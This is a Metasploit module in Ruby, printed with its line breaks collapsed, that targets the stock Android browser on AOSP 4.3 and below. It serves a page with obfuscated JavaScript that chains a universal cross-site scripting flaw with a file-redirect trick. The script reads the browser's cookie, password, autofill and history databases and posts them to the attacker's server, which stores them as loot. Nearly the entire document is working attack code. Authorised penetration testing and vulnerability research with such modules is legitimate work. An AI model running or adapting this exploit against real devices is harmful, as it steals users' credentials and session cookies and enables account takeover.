## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report include Msf::Exploit::JSObfu def initialize(info={}) super(update_info(info, 'Name' => 'Android Browser File Theft', 'Description' => %q{ This module steals the cookie, password, and autofill databases from the Browser application on AOSP 4.3 and below. }, 'Author' => [ 'Rafay Baloch', # Found UXSS bug in Android Browser 'joev' # File redirect and msf module ], 'License' => MSF_LICENSE, 'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]], 'PassiveActions' => [ 'WebServer' ], 'References' => [ # patch for file redirection, 2014 ['URL', 'https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0'], ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=90222'] # the UXSS ], 'DefaultAction' => 'WebServer' )) register_options([ OptString.new('ADDITIONAL_FILES', [ false, 'Comma-separated list of addition file URLs to steal.', ]), OptBool.new('DEFAULT_FILES', [ true, 'Steals a default set of file URLs', true ]) ]) end def run exploit end def on_request_uri(cli, request) if request.method.downcase == 'post' process_post(cli, request) send_response_html(cli, '') else print_status('Sending exploit landing page...') send_response_html(cli, exploit_html) end end def process_post(cli, request) data = JSON.parse(request.body) contents = hex2bin(data['data']) file = File.basename(data['url']) print_good("File received: #{(contents.bytesize.to_f/1000).round(2)}kb #{file}") loot_path = store_loot( file, 'application/x-sqlite3', cli.peerhost, contents, File.basename(data['url']), "#{cli.peerhost.ljust(16)} Android browser file" ) print_good("Saved to: #{loot_path}") end def file_urls default_urls = [ 'file:///data/data/com.android.browser/databases/webviewCookiesChromium.db', 'file:///data/data/com.android.browser/databases/webview.db', 'file:///data/data/com.android.browser/databases/autofill.db', 'file:///data/data/com.android.browser/databases/browser2.db', 'file:///data/data/com.android.browser/app_appcache/ApplicationCache.db', 'file:///data/data/com.android.browser/app_databases/Databases.db', 'file:///data/data/com.android.browser/databases/webviewCookiesChromiumPrivate.db' ] unless datastore['DEFAULT_FILES'] default_urls = [] end default_urls + (datastore['ADDITIONAL_FILES']||'').split(',') end def exploit_html %Q| | end def exploit_js js_obfuscate %Q| window.onmessage = function(e) { var x = new XMLHttpRequest; x.open("POST", location.href); x.send(JSON.stringify(e.data)) }; function xss() { var urls = (#{JSON.generate(file_urls)}); function tick() { setTimeout(function() { next(urls.shift()); }); }; window.onmessage = tick; function next(url) { if (!url) return; try { var f = document.createElement('iframe'); f.src = url; f.onload = function() { f.onload = null; function nested() { var x = new XMLHttpRequest; x.open('GET', location.href); x.responseType = 'arraybuffer'; x.send(); x.onload = function() { var buff = new Uint8Array(x.response); var hex = Array.prototype.map.call(buff, function(d) { var c = d.toString(16); return (c.length < 2) ? 0+c : c; }).join(new String); /*ensures there are no 'not allowed' responses that appear to be valid data*/ if (hex.length && hex.indexOf('#{Rex::Text.to_hex("not allowed","")}') === -1) { top.postMessage({data:hex,url:location.href}, '*'); } parent.postMessage(1,'*'); }; x.onerror = function() { parent.postMessage(1,'*'); }; } document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(nested.toString())+')()'; f.contentWindow.location = ""; }; document.body.appendChild(f); } catch(e) {t();} }; tick(); } var brokenFrame = document.createElement('iframe'); brokenFrame.src = 'http://localhost:100'; brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;') brokenFrame.onload = function() { brokenFrame.onload = null; document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(xss.toString())+')()'; brokenFrame.contentWindow.location = ""; }; document.body.appendChild(brokenFrame); | end # TODO: Make this a proper Rex::Text function def hex2bin(hex) hex.chars.each_slice(2).map(&:join).map { |c| c.to_i(16) }.map(&:chr).join end end